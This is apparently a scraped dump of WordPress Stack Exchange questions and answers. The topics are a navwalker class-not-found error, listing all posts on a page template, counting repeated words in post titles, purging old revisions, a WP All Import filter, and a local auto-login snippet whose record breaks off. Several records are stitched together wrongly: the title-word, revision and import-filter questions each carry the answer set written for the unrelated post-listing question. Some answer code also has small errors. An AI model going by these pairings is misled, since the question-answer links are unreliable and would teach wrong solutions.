#2 C:\laragon\www\VzyulTech\index.php(17): require('C:\laragon\www\...')
#3 {main}
thrown in <b>C:\laragon\www\VzyulTech\wp-content\themes\Version2\index.php</b> on line <b>17</b><br /></p>
<p>When I check line 17 it is the 'walker' => new WP_Bootstrap_Navwalker(),</p>
<pre><code> wp_nav_menu( array(
'theme_location' => 'primary',
'depth' => 2,
'container' => 'div',
'container_class' => 'collapse navbar-collapse',
'container_id' => 'bs-example-navbar-collapse-1',
'menu_class' => 'nav navbar-nav',
'fallback_cb' => 'WP_Bootstrap_Navwalker::fallback',
'walker' => new WP_Bootstrap_Navwalker(),
) );
</code></pre>
<p>any help is much appreciated.</p>
| [
{
"answer_id": 374531,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 0,
"selected": false,
"text": "<p>Place class-wp-bootstrap-navwalker.php in your WordPress theme folder /wp-content/your-theme/</p>\n<p>Open your WordPress themes functions.php file - /wp-content/your-theme/functions.php - and add the following code:</p>\n<p>If you encounter errors with the above code use a check like this to return clean errors to help diagnose the problem.</p>\n<pre><code> function register_navwalker()\n {\n if ( ! file_exists( get_template_directory() . '/class-wp-bootstrap-navwalker.php' ) ) {\n // file does not exist... return an error.\n return new WP_Error( 'class-wp-bootstrap-navwalker-missing', __( 'It appears the class-wp-bootstrap-navwalker.php file may be missing.', 'wp-bootstrap-navwalker' ) );\n } else {\n // file exists... require it.\n require_once get_template_directory . '/class-wp-bootstrap-navwalker.php';\n }\n } \n add_action( 'after_setup_theme', 'register_navwalker' );\n</code></pre>\n<p>You will also need to declare a new menu in your functions.php file if one doesn’t already exist.</p>\n<pre><code>register_nav_menus( array(\n 'top-menu' => __( 'Top Menu', 'THEMENAME' ),\n) );\n</code></pre>\n<p><strong>Usage</strong> :\nAdd or update any wp_nav_menu() functions in your theme (often found in header.php) to use the new walker by adding a 'walker' item to the wp_nav_menu args array.</p>\n<pre><code> <?php\nwp_nav_menu( array(\n 'theme_location' => 'top-menu',\n 'depth' => 2,\n 'container' => 'div',\n 'container_class' => 'collapse navbar-collapse',\n 'container_id' => 'bs-example-navbar-collapse-1',\n 'menu_class' => 'nav navbar-nav',\n 'fallback_cb' => 'WP_Bootstrap_Navwalker::fallback',\n 'walker' => new WP_Bootstrap_Navwalker(),\n) );\n?>\n</code></pre>\n"
},
{
"answer_id": 374535,
"author": "botondcs",
"author_id": 115678,
"author_profile": "https://wordpress.stackexchange.com/users/115678",
"pm_score": 2,
"selected": false,
"text": "<p>Your <code>register_navwalker</code> function is loading <code>navwalker</code> with this line:</p>\n<pre><code>require_once get_template_directory() . './class-wp-bootstrap-navwalker.php';\n</code></pre>\n<p>where you concatenate the path of the theme with this string:</p>\n<pre><code>'./class-wp-bootstrap-navwalker.php'\n</code></pre>\n<p>and the dot there at the beginning is a problem. The result would look like this:</p>\n<pre><code>DOMAIN/wp-content/themes/THEME./class-wp-bootstrap-navwalker.php\n</code></pre>\n<p>remove the dot and it should find and load the script.</p>\n<p><strong>EDIT:</strong></p>\n<p>Also you shouldn't change your original post or question, but add to it. Otherwise comments and answers might not make sense anymore.</p>\n"
},
{
"answer_id": 374583,
"author": "rolliefngrz",
"author_id": 194294,
"author_profile": "https://wordpress.stackexchange.com/users/194294",
"pm_score": 0,
"selected": false,
"text": "<p>My apoligies, I have been able to resolve the problem.</p>\n<p>What I did wrong was go to: <a href=\"https://github.com/wp-bootstrap/wp-bootstrap-navwalker\" rel=\"nofollow noreferrer\">https://github.com/wp-bootstrap/wp-bootstrap-navwalker</a> and on the php file for the wp-bootstrap-navwalker.php, i had right click and saved the file. I then opened the the file in a notepad and noticed it began with:</p>\n<pre><code><!DOCTYPE html>\n</code></pre>\n\n \n \n \n \n \n \n \n \n \n"
}
] | 2020/09/09 | [
"https://wordpress.stackexchange.com/questions/374523",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194294/"
] | [](https://i.stack.imgur.com/DkULs.jpg)Trying to implement `wp-bootstrap-navwalker.php` into my made from scratch template for wordpress.
The File for the `class-wp-bootstrap-navwalker.php` is located in the root directory of my theme.
**functions.php**
```
function register_navwalker()
{
require_once get_template_directory() . '/class-wp-bootstrap-navwalker.php';<br>
}
add_action( 'after_setup_theme', 'register_navwalker' );
```
register\_nav\_menus( array(
'primary' => \_\_( 'Primary Menu', 'primary' ),
) );
**cover.php**
With the code below within the `<nav> and </nav>` tags
```
<?php
wp_nav_menu( array(
'theme_location' => 'top-menu',
'depth' => 2,
'container' => 'div',
'container_class' => 'collapse navbar-collapse',
'container_id' => 'bs-example-navbar-collapse-1',
'menu_class' => 'nav navbar-nav',
'fallback_cb' => 'WP_Bootstrap_Navwalker::fallback',
'walker' => new WP_Bootstrap_Navwalker(),
) );
?>
```
When I save changes and reload my website, I get get the wp-bootstrap-navwalker page from github.
I've checked the source of the page and see this at the footer:
**Fatal error**: Uncaught Error: Class 'WP\_Bootstrap\_Navwalker' not found in C:\laragon\www\VzyulTech\wp-content\themes\Version2\index.php:17
Stack trace:
#0 C:\laragon\www\VzyulTech\wp-includes\template-loader.php(106): include()
#1 C:\laragon\www\VzyulTech\wp-blog-header.php(19): require\_once('C:\laragon\www\...')
#2 C:\laragon\www\VzyulTech\index.php(17): require('C:\laragon\www\...')
#3 {main}
thrown in **C:\laragon\www\VzyulTech\wp-content\themes\Version2\index.php** on line **17**
When I check line 17 it is the 'walker' => new WP\_Bootstrap\_Navwalker(),
```
wp_nav_menu( array(
'theme_location' => 'primary',
'depth' => 2,
'container' => 'div',
'container_class' => 'collapse navbar-collapse',
'container_id' => 'bs-example-navbar-collapse-1',
'menu_class' => 'nav navbar-nav',
'fallback_cb' => 'WP_Bootstrap_Navwalker::fallback',
'walker' => new WP_Bootstrap_Navwalker(),
) );
```
any help is much appreciated. | Your `register_navwalker` function is loading `navwalker` with this line:
```
require_once get_template_directory() . './class-wp-bootstrap-navwalker.php';
```
where you concatenate the path of the theme with this string:
```
'./class-wp-bootstrap-navwalker.php'
```
and the dot there at the beginning is a problem. The result would look like this:
```
DOMAIN/wp-content/themes/THEME./class-wp-bootstrap-navwalker.php
```
remove the dot and it should find and load the script.
**EDIT:**
Also you shouldn't change your original post or question, but add to it. Otherwise comments and answers might not make sense anymore. |
374,539 | <p>I am learning about WordPress development. I ran into an issue but could not figure out what am I doing wrong</p>
<p>I want to show all of the posts on a page using a custom template. I am following this tutorial <a href="https://developer.wordpress.org/themes/basics/the-loop/#blog-archive" rel="nofollow noreferrer">https://developer.wordpress.org/themes/basics/the-loop/#blog-archive</a></p>
<p><strong>So far:</strong></p>
<p>1: I have created a custom page template with the name of "homepage"</p>
<p>2: I have created a page and assigned page template "homepage" and set that page as homepage from the settings panel.</p>
<p>3: In the page template, I have added the below code</p>
<pre><code>/*
* Template Name: Homepage
* Template Post Type: page
*/
get_header();
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2 style="color:#fff;">', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
get_footer();
?>
</code></pre>
<p>The above code only displays the current page title and featured image, NOT all of the posts title and featured image.</p>
<p> As per the documentation I am doing everything right, but on the frontend, it is not showing all of the posts, Any idea what I am doing wrong? </p>
| [
{
"answer_id": 374540,
"author": "t2pe",
"author_id": 106499,
"author_profile": "https://wordpress.stackexchange.com/users/106499",
"pm_score": -1,
"selected": false,
"text": "<p>When you use a Loop in a specific Page or Post, the loop contains data only from that single Page or Post. So what you are seeing is correct in as much as you have assigned that template to a specific page.</p>\n<p>In the case where you want to see more than just the current page or post, you need to create a different kind of loop based on a custom query. There are a few different ways of doing this but if you are new to Wordpress it will really help to start with looking at WP_Query.</p>\n<p>When you use WP_Query, you can specify exactly how much and what type of content to collect data for using arguments. Then use the loop to iterate through the results.</p>\n<p>Rather than write a code snippet for you, I'd suggest <a href=\"https://developer.wordpress.org/reference/classes/wp_query/\" rel=\"nofollow noreferrer\">working through the support page on Wordpress</a> as its a good place for grounding your knowledge of WP_Query. You can keep coming back to it.</p>\n<p>In particular, see the Argument that specifies the number of posts/pages to retrieve, which if you want all of them, should be set to -1.</p>\n<pre><code>$query = new WP_Query( array( 'posts_per_page' => -1 ) );\n</code></pre>\n"
},
{
"answer_id": 374541,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 0,
"selected": false,
"text": "<blockquote>\n<p>As per the documentation I am doing everything right, but on the\nfrontend, it is not showing all of the posts, Any idea what I am doing\nwrong?</p>\n</blockquote>\n<p>The documentation does not say to use a custom page template for displaying the blog archive. As shown in the <a href=\"https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview\" rel=\"nofollow noreferrer\">template hierarchy</a> the template for your blog posts archive should be home.php, or index.php. Then in <em>that</em> template you add the loop as described at <a href=\"https://developer.wordpress.org/themes/basics/the-loop/#blog-archive\" rel=\"nofollow noreferrer\">your link</a>:</p>\n<pre><code><?php \nif ( have_posts() ) : \n while ( have_posts() ) : the_post(); \n the_title( '<h2>', '</h2>' ); \n the_post_thumbnail(); \n the_excerpt();\n endwhile; \nelse: \n _e( 'Sorry, no posts matched your criteria.', 'textdomain' ); \nendif; \n?>\n</code></pre>\n<p>This template should not have the <code>Template Name:</code> header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in <em>Settings > Reading</em>.</p>\n<p>Note that all templates in the template hierarchy use the same basic loop:</p>\n<pre><code>while ( have_posts() ) : the_post(); \n\nendwhile; \n</code></pre>\n<p>You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above.</p>\n"
},
{
"answer_id": 374551,
"author": "nikhil Hadvani",
"author_id": 178376,
"author_profile": "https://wordpress.stackexchange.com/users/178376",
"pm_score": 0,
"selected": false,
"text": "<p>Please check below code to get all posts</p>\n<pre><code>$args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'post',\n 'orderby' => 'date',\n 'order' => 'DESC',\n);\n\nquery_posts($args);\nwhile (have_posts()): the_post();\nthe_title();\nthe_excerpt();\nget_the_post_thumbnail_url($post->ID);\nendwhile;\nwp_reset_query();\n</code></pre>\n<p>Please try above code.\nNote: <code>get_the_post_thumbnail_url();</code> will return featured image URL. so you can directly add into <code>img</code> tag like</p>\n<pre><code><img src="<?php echo get_the_post_thumbnail_url(); ?>">\n</code></pre>\n"
}
] | 2020/09/09 | [
"https://wordpress.stackexchange.com/questions/374539",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194371/"
] | I am learning about WordPress development. I ran into an issue but could not figure out what am I doing wrong
I want to show all of the posts on a page using a custom template. I am following this tutorial <https://developer.wordpress.org/themes/basics/the-loop/#blog-archive>
**So far:**
1: I have created a custom page template with the name of "homepage"
2: I have created a page and assigned page template "homepage" and set that page as homepage from the settings panel.
3: In the page template, I have added the below code
```
/*
* Template Name: Homepage
* Template Post Type: page
*/
get_header();
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2 style="color:#fff;">', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
get_footer();
?>
```
The above code only displays the current page title and featured image, NOT all of the posts title and featured image.
As per the documentation I am doing everything right, but on the frontend, it is not showing all of the posts, Any idea what I am doing wrong? | >
> As per the documentation I am doing everything right, but on the
> frontend, it is not showing all of the posts, Any idea what I am doing
> wrong?
>
>
>
The documentation does not say to use a custom page template for displaying the blog archive. As shown in the [template hierarchy](https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview) the template for your blog posts archive should be home.php, or index.php. Then in *that* template you add the loop as described at [your link](https://developer.wordpress.org/themes/basics/the-loop/#blog-archive):
```
<?php
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2>', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
?>
```
This template should not have the `Template Name:` header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in *Settings > Reading*.
Note that all templates in the template hierarchy use the same basic loop:
```
while ( have_posts() ) : the_post();
endwhile;
```
You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above. |
374,555 | <p>Is there any technical way to search post titles and return the results of the most used duplicated words in them?</p>
<p>I.e
Three articles in total:</p>
<ul>
<li>The quick brown fox jumps over the lazy dog</li>
<li>A brown bag for the summer</li>
<li>New record - Athlete jumps higher</li>
</ul>
<p>Most used words in post titles:</p>
<ol>
<li>Brown</li>
<li>Jumps</li>
</ol>
| [
{
"answer_id": 374540,
"author": "t2pe",
"author_id": 106499,
"author_profile": "https://wordpress.stackexchange.com/users/106499",
"pm_score": -1,
"selected": false,
"text": "<p>When you use a Loop in a specific Page or Post, the loop contains data only from that single Page or Post. So what you are seeing is correct in as much as you have assigned that template to a specific page.</p>\n<p>In the case where you want to see more than just the current page or post, you need to create a different kind of loop based on a custom query. There are a few different ways of doing this but if you are new to Wordpress it will really help to start with looking at WP_Query.</p>\n<p>When you use WP_Query, you can specify exactly how much and what type of content to collect data for using arguments. Then use the loop to iterate through the results.</p>\n<p>Rather than write a code snippet for you, I'd suggest <a href=\"https://developer.wordpress.org/reference/classes/wp_query/\" rel=\"nofollow noreferrer\">working through the support page on Wordpress</a> as its a good place for grounding your knowledge of WP_Query. You can keep coming back to it.</p>\n<p>In particular, see the Argument that specifies the number of posts/pages to retrieve, which if you want all of them, should be set to -1.</p>\n<pre><code>$query = new WP_Query( array( 'posts_per_page' => -1 ) );\n</code></pre>\n"
},
{
"answer_id": 374541,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 0,
"selected": false,
"text": "<blockquote>\n<p>As per the documentation I am doing everything right, but on the\nfrontend, it is not showing all of the posts, Any idea what I am doing\nwrong?</p>\n</blockquote>\n<p>The documentation does not say to use a custom page template for displaying the blog archive. As shown in the <a href=\"https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview\" rel=\"nofollow noreferrer\">template hierarchy</a> the template for your blog posts archive should be home.php, or index.php. Then in <em>that</em> template you add the loop as described at <a href=\"https://developer.wordpress.org/themes/basics/the-loop/#blog-archive\" rel=\"nofollow noreferrer\">your link</a>:</p>\n<pre><code><?php \nif ( have_posts() ) : \n while ( have_posts() ) : the_post(); \n the_title( '<h2>', '</h2>' ); \n the_post_thumbnail(); \n the_excerpt();\n endwhile; \nelse: \n _e( 'Sorry, no posts matched your criteria.', 'textdomain' ); \nendif; \n?>\n</code></pre>\n<p>This template should not have the <code>Template Name:</code> header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in <em>Settings > Reading</em>.</p>\n<p>Note that all templates in the template hierarchy use the same basic loop:</p>\n<pre><code>while ( have_posts() ) : the_post(); \n\nendwhile; \n</code></pre>\n<p>You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above.</p>\n"
},
{
"answer_id": 374551,
"author": "nikhil Hadvani",
"author_id": 178376,
"author_profile": "https://wordpress.stackexchange.com/users/178376",
"pm_score": 0,
"selected": false,
"text": "<p>Please check below code to get all posts</p>\n<pre><code>$args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'post',\n 'orderby' => 'date',\n 'order' => 'DESC',\n);\n\nquery_posts($args);\nwhile (have_posts()): the_post();\nthe_title();\nthe_excerpt();\nget_the_post_thumbnail_url($post->ID);\nendwhile;\nwp_reset_query();\n</code></pre>\n<p>Please try above code.\nNote: <code>get_the_post_thumbnail_url();</code> will return featured image URL. so you can directly add into <code>img</code> tag like</p>\n<pre><code><img src="<?php echo get_the_post_thumbnail_url(); ?>">\n</code></pre>\n"
}
] | 2020/09/09 | [
"https://wordpress.stackexchange.com/questions/374555",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/151253/"
] | Is there any technical way to search post titles and return the results of the most used duplicated words in them?
I.e
Three articles in total:
* The quick brown fox jumps over the lazy dog
* A brown bag for the summer
* New record - Athlete jumps higher
Most used words in post titles:
1. Brown
2. Jumps | >
> As per the documentation I am doing everything right, but on the
> frontend, it is not showing all of the posts, Any idea what I am doing
> wrong?
>
>
>
The documentation does not say to use a custom page template for displaying the blog archive. As shown in the [template hierarchy](https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview) the template for your blog posts archive should be home.php, or index.php. Then in *that* template you add the loop as described at [your link](https://developer.wordpress.org/themes/basics/the-loop/#blog-archive):
```
<?php
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2>', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
?>
```
This template should not have the `Template Name:` header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in *Settings > Reading*.
Note that all templates in the template hierarchy use the same basic loop:
```
while ( have_posts() ) : the_post();
endwhile;
```
You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above. |
374,569 | <p>I know I can use <code>define('WP_POST_REVISIONS', 5);</code> to limit future post revisions to 5, but how would I go about purging all <em>existing</em> revisions except the latest 5?</p>
| [
{
"answer_id": 374540,
"author": "t2pe",
"author_id": 106499,
"author_profile": "https://wordpress.stackexchange.com/users/106499",
"pm_score": -1,
"selected": false,
"text": "<p>When you use a Loop in a specific Page or Post, the loop contains data only from that single Page or Post. So what you are seeing is correct in as much as you have assigned that template to a specific page.</p>\n<p>In the case where you want to see more than just the current page or post, you need to create a different kind of loop based on a custom query. There are a few different ways of doing this but if you are new to Wordpress it will really help to start with looking at WP_Query.</p>\n<p>When you use WP_Query, you can specify exactly how much and what type of content to collect data for using arguments. Then use the loop to iterate through the results.</p>\n<p>Rather than write a code snippet for you, I'd suggest <a href=\"https://developer.wordpress.org/reference/classes/wp_query/\" rel=\"nofollow noreferrer\">working through the support page on Wordpress</a> as its a good place for grounding your knowledge of WP_Query. You can keep coming back to it.</p>\n<p>In particular, see the Argument that specifies the number of posts/pages to retrieve, which if you want all of them, should be set to -1.</p>\n<pre><code>$query = new WP_Query( array( 'posts_per_page' => -1 ) );\n</code></pre>\n"
},
{
"answer_id": 374541,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 0,
"selected": false,
"text": "<blockquote>\n<p>As per the documentation I am doing everything right, but on the\nfrontend, it is not showing all of the posts, Any idea what I am doing\nwrong?</p>\n</blockquote>\n<p>The documentation does not say to use a custom page template for displaying the blog archive. As shown in the <a href=\"https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview\" rel=\"nofollow noreferrer\">template hierarchy</a> the template for your blog posts archive should be home.php, or index.php. Then in <em>that</em> template you add the loop as described at <a href=\"https://developer.wordpress.org/themes/basics/the-loop/#blog-archive\" rel=\"nofollow noreferrer\">your link</a>:</p>\n<pre><code><?php \nif ( have_posts() ) : \n while ( have_posts() ) : the_post(); \n the_title( '<h2>', '</h2>' ); \n the_post_thumbnail(); \n the_excerpt();\n endwhile; \nelse: \n _e( 'Sorry, no posts matched your criteria.', 'textdomain' ); \nendif; \n?>\n</code></pre>\n<p>This template should not have the <code>Template Name:</code> header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in <em>Settings > Reading</em>.</p>\n<p>Note that all templates in the template hierarchy use the same basic loop:</p>\n<pre><code>while ( have_posts() ) : the_post(); \n\nendwhile; \n</code></pre>\n<p>You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above.</p>\n"
},
{
"answer_id": 374551,
"author": "nikhil Hadvani",
"author_id": 178376,
"author_profile": "https://wordpress.stackexchange.com/users/178376",
"pm_score": 0,
"selected": false,
"text": "<p>Please check below code to get all posts</p>\n<pre><code>$args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'post',\n 'orderby' => 'date',\n 'order' => 'DESC',\n);\n\nquery_posts($args);\nwhile (have_posts()): the_post();\nthe_title();\nthe_excerpt();\nget_the_post_thumbnail_url($post->ID);\nendwhile;\nwp_reset_query();\n</code></pre>\n<p>Please try above code.\nNote: <code>get_the_post_thumbnail_url();</code> will return featured image URL. so you can directly add into <code>img</code> tag like</p>\n<pre><code><img src="<?php echo get_the_post_thumbnail_url(); ?>">\n</code></pre>\n"
}
] | 2020/09/09 | [
"https://wordpress.stackexchange.com/questions/374569",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/49543/"
] | I know I can use `define('WP_POST_REVISIONS', 5);` to limit future post revisions to 5, but how would I go about purging all *existing* revisions except the latest 5? | >
> As per the documentation I am doing everything right, but on the
> frontend, it is not showing all of the posts, Any idea what I am doing
> wrong?
>
>
>
The documentation does not say to use a custom page template for displaying the blog archive. As shown in the [template hierarchy](https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview) the template for your blog posts archive should be home.php, or index.php. Then in *that* template you add the loop as described at [your link](https://developer.wordpress.org/themes/basics/the-loop/#blog-archive):
```
<?php
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2>', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
?>
```
This template should not have the `Template Name:` header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in *Settings > Reading*.
Note that all templates in the template hierarchy use the same basic loop:
```
while ( have_posts() ) : the_post();
endwhile;
```
You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above. |
374,623 | <p>Wordpress wpallimport plugin This filter allows modifying the option shown in the options type dropdown for import</p>
<p>The function is as follow: I want to add $custom_types as string array.</p>
<pre><code>function wpai_custom_types( $custom_types ) {
// Modify the custom types to be shown on Step 1.
$custom_types = array("woocommerce orders" , " posts")
// Return the updated list.
return $custom_types;
}
add_filter( 'pmxi_custom_types', 'wpai_custom_types', 10, 1 );
</code></pre>
<p>But it won't work</p>
| [
{
"answer_id": 374540,
"author": "t2pe",
"author_id": 106499,
"author_profile": "https://wordpress.stackexchange.com/users/106499",
"pm_score": -1,
"selected": false,
"text": "<p>When you use a Loop in a specific Page or Post, the loop contains data only from that single Page or Post. So what you are seeing is correct in as much as you have assigned that template to a specific page.</p>\n<p>In the case where you want to see more than just the current page or post, you need to create a different kind of loop based on a custom query. There are a few different ways of doing this but if you are new to Wordpress it will really help to start with looking at WP_Query.</p>\n<p>When you use WP_Query, you can specify exactly how much and what type of content to collect data for using arguments. Then use the loop to iterate through the results.</p>\n<p>Rather than write a code snippet for you, I'd suggest <a href=\"https://developer.wordpress.org/reference/classes/wp_query/\" rel=\"nofollow noreferrer\">working through the support page on Wordpress</a> as its a good place for grounding your knowledge of WP_Query. You can keep coming back to it.</p>\n<p>In particular, see the Argument that specifies the number of posts/pages to retrieve, which if you want all of them, should be set to -1.</p>\n<pre><code>$query = new WP_Query( array( 'posts_per_page' => -1 ) );\n</code></pre>\n"
},
{
"answer_id": 374541,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 0,
"selected": false,
"text": "<blockquote>\n<p>As per the documentation I am doing everything right, but on the\nfrontend, it is not showing all of the posts, Any idea what I am doing\nwrong?</p>\n</blockquote>\n<p>The documentation does not say to use a custom page template for displaying the blog archive. As shown in the <a href=\"https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview\" rel=\"nofollow noreferrer\">template hierarchy</a> the template for your blog posts archive should be home.php, or index.php. Then in <em>that</em> template you add the loop as described at <a href=\"https://developer.wordpress.org/themes/basics/the-loop/#blog-archive\" rel=\"nofollow noreferrer\">your link</a>:</p>\n<pre><code><?php \nif ( have_posts() ) : \n while ( have_posts() ) : the_post(); \n the_title( '<h2>', '</h2>' ); \n the_post_thumbnail(); \n the_excerpt();\n endwhile; \nelse: \n _e( 'Sorry, no posts matched your criteria.', 'textdomain' ); \nendif; \n?>\n</code></pre>\n<p>This template should not have the <code>Template Name:</code> header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in <em>Settings > Reading</em>.</p>\n<p>Note that all templates in the template hierarchy use the same basic loop:</p>\n<pre><code>while ( have_posts() ) : the_post(); \n\nendwhile; \n</code></pre>\n<p>You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above.</p>\n"
},
{
"answer_id": 374551,
"author": "nikhil Hadvani",
"author_id": 178376,
"author_profile": "https://wordpress.stackexchange.com/users/178376",
"pm_score": 0,
"selected": false,
"text": "<p>Please check below code to get all posts</p>\n<pre><code>$args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'post',\n 'orderby' => 'date',\n 'order' => 'DESC',\n);\n\nquery_posts($args);\nwhile (have_posts()): the_post();\nthe_title();\nthe_excerpt();\nget_the_post_thumbnail_url($post->ID);\nendwhile;\nwp_reset_query();\n</code></pre>\n<p>Please try above code.\nNote: <code>get_the_post_thumbnail_url();</code> will return featured image URL. so you can directly add into <code>img</code> tag like</p>\n<pre><code><img src="<?php echo get_the_post_thumbnail_url(); ?>">\n</code></pre>\n"
}
] | 2020/09/10 | [
"https://wordpress.stackexchange.com/questions/374623",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194464/"
] | Wordpress wpallimport plugin This filter allows modifying the option shown in the options type dropdown for import
The function is as follow: I want to add $custom\_types as string array.
```
function wpai_custom_types( $custom_types ) {
// Modify the custom types to be shown on Step 1.
$custom_types = array("woocommerce orders" , " posts")
// Return the updated list.
return $custom_types;
}
add_filter( 'pmxi_custom_types', 'wpai_custom_types', 10, 1 );
```
But it won't work | >
> As per the documentation I am doing everything right, but on the
> frontend, it is not showing all of the posts, Any idea what I am doing
> wrong?
>
>
>
The documentation does not say to use a custom page template for displaying the blog archive. As shown in the [template hierarchy](https://developer.wordpress.org/themes/basics/template-hierarchy/#visual-overview) the template for your blog posts archive should be home.php, or index.php. Then in *that* template you add the loop as described at [your link](https://developer.wordpress.org/themes/basics/the-loop/#blog-archive):
```
<?php
if ( have_posts() ) :
while ( have_posts() ) : the_post();
the_title( '<h2>', '</h2>' );
the_post_thumbnail();
the_excerpt();
endwhile;
else:
_e( 'Sorry, no posts matched your criteria.', 'textdomain' );
endif;
?>
```
This template should not have the `Template Name:` header, or be assigned to a page. Instead it will be applied automatically to whichever page you have selected as the latest posts page in *Settings > Reading*.
Note that all templates in the template hierarchy use the same basic loop:
```
while ( have_posts() ) : the_post();
endwhile;
```
You do not query any posts from the template. WordPress automatically queries the correct posts, and the template's only job is to display whichever posts have been queried. Which template is used, and why, is determined by the template hierarchy, linked above. |
374,693 | <p>I have a little non-standard WP dev environment, I use one WP core for all my projects and switch each project in core's wp-config.php just changing the <code>$project</code> variable (e.g. proj1, proj2, example...). Projects and core are separated and each project has its own DB, wp-content folder, wp-config-dev.php (DB credentials and table prefix), and wp-config.php (usual wp-config that I deploy on the server).</p>
<pre class="lang-php prettyprint-override"><code>//core's wp-config.php
<?php
$project = 'example';
define( 'WP_CONTENT_DIR', 'C:/dev/projects/'.$project.'/wp/wp-content' );
define( 'WP_CONTENT_URL', 'https://projects.folder/'.$project.'/wp/wp-content' );
include('C:/dev/projects/'.$project.'/wp/wp-config-dev.php');
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
require_once( ABSPATH . 'wp-settings.php' );
// custom functions
include('custom.php');
</code></pre>
<p>All my projects on the development environment have the same user and password (e.g. foo and bar) and I change them when I export DB when my project is ready to production, so my goal to switch each project just with changing <code>$project</code> and not login in every time cuz it is really annoying.</p>
<p>When i switch beetwen projects i have always to log in again into switched project. In included <code>custom.php</code> file i have <code>wp_signon()</code> function that was worked on WP 4+ but since WP 5.0 it is stopped working. Earlier that approach automatically logged in each project and i even can't log out cuz it keep me logged on page reload :)</p>
<pre class="lang-php prettyprint-override"><code>$current_user = wp_get_current_user();
if (!user_can( $current_user, 'administrator' )) {
//without if(){} i have same behaviour
$creds = array();
$creds['user_login'] = 'foo';
$creds['user_password'] = 'bar';
$creds['remember'] = false;
wp_signon( $creds, false );
}
</code></pre>
<p>Now after the switch, I need to update the page again to the admin bar appear and when I go to the console it redirects me to wp-login.php where is user input had filled and the password input are empty.</p>
<p><a href="https://i.stack.imgur.com/eohV2.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/eohV2.png" alt="enter image description here" /></a></p>
<p>So how to make it always automatically logged in when I change the project and make that each session has no expiration time?</p>
<p><strong>Note.</strong> I need to make it work only in the custom.php file that I include to core's wp-config, I don't need to make it in each project instance that I deploy on the server.</p>
<hr />
<p><strong>Update</strong>. Now autologin works fine, the problem was in second parameter of the <code>wp_signon()</code> function, it should be true if you use HTTPS on your site.</p>
<pre class="lang-php prettyprint-override"><code>//custom.php
echo "is_user_logged_in() — ";
var_dump(is_user_logged_in());
//this condition not working after switch project, have to reload page
if (!is_user_logged_in()) {
$creds = array();
$creds['user_login'] = 'foo';
$creds['user_password'] = 'bar';
$creds['remember'] = false;
$user = wp_signon( $creds, true ); //set second parameter to true to enable secure cookies
add_filter( 'auth_cookie_expiration', 'keep_me_logged_in_for_1_year' );
